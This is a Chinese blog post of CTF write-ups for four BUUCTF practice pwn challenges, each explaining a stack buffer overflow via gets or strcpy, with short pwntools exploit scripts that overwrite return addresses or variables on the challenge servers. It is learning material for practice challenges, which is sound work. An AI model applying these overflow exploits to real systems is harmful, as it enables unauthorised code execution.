buu pwn刷题——分类题型1——gets溢出无脑填充

最新推荐文章于 2024-06-23 18:50:21 发布
最新推荐文章于 2024-06-23 18:50:21 发布
阅读量1k 收藏 3
点赞数
分类专栏: # PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43876357/article/details/108447312
版权

gets漏洞

gets从标准输入设备读字符串函数,其可以无限读取,不会判断上限,以回车结束读取,所以应该确保buffer的空间足够大,以便在执行读操作时不发生溢出。

栈结构:

(图自ctf-wiki)

warmup_csaw_2016

找到gets漏洞,v5到rbp有0x40的内存

无脑填充即可:'a' * 0x40 + 'b' * 8 + p64(0x40060d)

exp

#!/usr/bin/python
from pwn import *

r = remote('node3.buuoj.cn', 29261)

r.recvuntil('WOW:')
address =0x000000000040060D
payload = 'A' * 72 + p64(address)

r.sendline(payload)

r.interactive()

rip

fun()函数找到system,同样gets溢出,填充:'a' * 0xf + 'b' * 8

exp

from pwn import *

#p = remote('node3.buuoj.cn', 27581)
p = process('./pwn1')
payload = 'a' * 23 + p64(0x401186) 
p.sendline(payload)

p.interactive()

这里说一下,不知道为什么这个脚本远程跑不出来。。。(填充部分为'a' * 0xf就可以跑,但是这样本地是跑不出来的),但是思路是没问题的~

ciscn_2019_n_1

同gets,我们要做的就是把v2的值改成11.28125,看一下内存中v1和v2的位置


填充:'a' * (0x30-0x4),然后再将浮点数转为16进制即可改变v2的值。

exp


from pwn import *

r=remote('node3.buuoj.cn',27625)

payload='a'*0x2c+p64(0x41348000)
r.recvuntil("Let's guess the number.")
r.sendline(payload)

r.interactive()

pwn1_sctf_2016

把它放在最后是因为也是填充,但是不是gets溢出

可以看到我们输入用的函数是fgets,限制了长度,所以不能直接从这里溢出。继续往下看,发现溢出点——strcpy

整个程序的意思就是我们可以把'I'替换成'you',在strcpy函数中,未对s进行限制,v1对输入的I进行变换后:v0长度=‘I’的个数*3。(32*3>0x3c)所以可以溢出。

exp

from pwn import *

#p = process("./pwn1_sctf_2016")
p = remote('node3.buuoj.cn','27953')

payload = 'I'*20 + "aaaa" + p32(0x08048F0D)
p.sendline(payload)
p.interactive()

 

43v3rY0unG
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
1. **解析WASM模块**:使用WABT或其他工具将`test.wasm`转换成人类可读的文本格式,例如Wat。 2. **理解控制流**:识别函数的入口和出口,理解基本块之间的跳转关系。 3. **分析操作码**:理解WASM指令集,识别...
BUU 论坛的编辑器163Editor
09-21
"BUU 论坛的编辑器163Editor"是一个专为BUU论坛设计的文本编辑工具,它可能集成了丰富的富文本编辑功能,让用户在论坛发帖或回帖时可以方便地添加格式化文本、图片、链接等元素,提升交互体验。"DianUbb.rar"是这个...
pwn入门:详解gdb调试程序的常见命令
Bossfrank的博客
11-03 2518
本文主要以对一个程序的调试过程为例,介绍gdb调试器的常见命令,并直观的展示所谓“溢出”覆盖的效果以及大小端序的问题。涉及的知识点包括:pwn题目环境的部署、gdb调试的常见命令、大小端序的影响、简单解pwn题目脚本的编写。
pwn-随机计算题类型
IT_huanhuan的博客
05-25 1125
沙盒机制也就是我们常说的沙箱,英文名sandbox,是计算机领域的虚拟技术,常见于安全方向。一般说来,我们会将不受信任的软件放在沙箱中运行,一旦该软件有恶意行为,则禁止该程序的进一步运行,不会对真实系统造成任何危害。在ctf比赛中,pwn题中的沙盒一般都会限制execve的系统调用,这样一来one_gadget和system调用都不好使,**只能采取open/read/write的组合方式来读取flag。
Pwn刷题记录(不停更新)
最新发布
qq_66013948的博客
06-23 322
​ 发现了个事儿,for循环会执行两次,所以这里采用第一次不溢出,通过格式化字符串漏洞对Canary的值进行泄露,之后就可以在合适的地方填入canary的值来绕过canary保护了。​ 之后就是具体进行溢出了,计算溢出的长度也比较简单,这里直接上答案吧,116字节,不过,第100到104为canary的值。​ 根据这俩进行计算,可得到偏移,结果是0x7c/4=31。​ 除了NX之外,似乎就只有 Canary了。​ 因此,思路就很明确了。
PWN学习-ADworld刷题
WocW的博客
06-04 1592
前言 搁置了一段时间没更博,经历了考试还有一些其他事,决心好好去学pwn。学习的方法打算是按照看视频课加刷题加查找资料来学习。 先把新手题都刷了一遍,都是很入门的题目,没啥好提的,收获也少。然后去刷进阶的题,但是目前还没有遇到堆的题目,视频课已经快学完了,学习资料是看的B站上的这个,觉得讲的很好,YOTUBE上也有 讲一下刷进阶题时个人遇到的一些坑…或者是学到的东西 分析 pwn-100 检查...
pwn -----gets 漏洞的利用
qq_41071646的博客
12-29 2083
其实做pwn题是有一段时间了  但是因为复习以及学习驱动 所以没有什么时间写博客  然后这一次写一个pwn的题  这个题 还是很简单的    先用ida 看一下 发现了 我们这个题 有明显的利用漏洞 gets  然后 我们发现了  有srand 是要确定随机种子 那么 如果 我们 把这个种子 给覆盖掉  那么我们就可以 算出随机数 直接 得到flag   在 调试下 发现了   然后...
CTFPWN的一些题型(持续更新......)
qq_44371274的博客
04-05 2119
ret2test 先运行一下,看程序做了些什么 发现只是让我们输入一串字符。接下来具体分析下属性,并且丢进gdb里分析一下 可以看到这是一个64位的程序,而且什么保护都没有开,接下来拖进IDA里继续分析 我们进入v4 F5反编译之后,可以很明显地看出程序有gets输入漏洞,gets可以读取无限长的字符串,我们就可以利用这个漏洞造成了一个栈溢出 发现分配的栈的空间大小是70,由于程序在返回地址前...
【七日打卡】Pwn之栈溢出利用详解
阿道夫的博客
12-22 954
🖥栈是汇编语言中的一种数据结构,遵循LIFO(Last in Fist Out)原则,即后进先出。压栈(Push)、出栈(Pop)。📌注意:栈从高地址向低地址存储。
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
日志 7.13 pwn溢出基础知识
RobinZZX的博客
07-13 1536
溢出 先上堆图: 条件: 可以写入堆 大小无限制 堆的数据结构 一般情况下,物理相邻的两个空闲 chunk 会被合并为一个 chunk struct malloc_chunk { INTERNAL_SIZE_T prev_size; /*上一个chunk空闲时记录上一个chunk的大小,上一个chunk被使用时作为上个chunk的数据部分 */ INTERNAL_SIZE_...
Bugku-pwn1新手签到题
xindada559的博客
06-07 407
首先这道题目mieyo
PWN学习笔记(1)
Jason_ZhouYetao的博客
07-16 2780
首先来说说pwn,这个水还是很深的,不过我学习pwn的原因是我觉得pwn是最接近黑客的东西,当然web也是我考虑的一个方向,但是pwn更加偏向于对代码这方面的知识,所以我也就选择了pwn这个方向。 0x1 首先pwn的最基本的东西就是c语言,一般的pwn题目都是以c代码来出的题目,所以学好c是做pwn的前提,之后还需要一定的Linux命令的基础和各种插件的使用(比如在溢出这块还是以gdb的pe...
今天你pwn了吗(上)
蚁景网安学院
05-07 3993
前言:"二进制太难了", 一起到 buu 开始 刷题吧。这里 仅记录 下 非高分题目的 解题思路和 知识讲解。特别是文章里的函数,我特意整理了下,还请好好学习下。test...
pwn基础知识笔记
月阴荒的博客
02-20 2323
算是总的开一篇文章,把学到的知识总结一下,之后会重复写到各个文章里面 checksec指令, 用来查询pwn题目的壳和保护,并且能够看到程序的信息 1.Canary保护 参考链接:https://blog.csdn.net/weixin_44540286/article/details/101629735?utm_source=distribute.pc_relevant.none-task Ca...
pwn学习总结(二) —— 基础知识(持续更新)
qq_41988448的博客
11-19 942
pwn学习总结(四) —— 基础知识(持续更新)PLT表&GOT表 PLT表&GOT表 PLT表:指向GOT表,作用是动态加载函数地址 GOT表:位于数据段,函数被调用时,成员为函数在内存中的实际地址 ...
[pwn入门] 1. get函数缓冲区溢出
weixin_34092370的博客
01-17 680
查看保护 寻找漏洞 ida打开elf文件: gets函数存在缓冲区溢出漏洞,我们可以通过超长的字符串来覆盖缓冲区,从而修改ROP。为了达到这个目的,我们需要首先计算,输入的&s的堆栈地址位置距离堆栈的底部ebp的位置。Ebp的下一个地址,就是记录了返回地址的位置 s距离返回地址的偏移 gdb打开,并设置断点。 $esp ...
buu cipher
10-23
Buu Cipher 是一种对称加密算法,也被称为布式密码。它是一种较为简单的加密算法,基于置换和替代的原理进行加密和解密。Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中的不同位置,增加了密文的复杂性。 其次,扩散步骤通过将每个字符替换为另一个字符来进一步混淆数据。此替换过程可以由算法中的扩散函数完成,该函数使用密钥和置换表来生成相应的替代字符。这样,明文中的每个字符都将被替换为不同的字符。 解密过程与加密过程相反。先使用相同的密钥和置换表进行扩散的逆向操作,将密文中的每个字符恢复为替代字符。然后使用相同的密钥和置换表进行混淆的逆向操作,恢复密文中字符的顺序,即可得到原始的明文。 尽管 Buu Cipher 是一种较为简单的加密算法,但它仍可以提供基本的保密性,以防止未授权者对加密数据的解读。然而,它的加密强度相对较低,可能容易受到密码分析方法的攻击。因此,在实际应用中,我们可能需要结合其他更为复杂和安全的加密算法来提高数据的保密性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值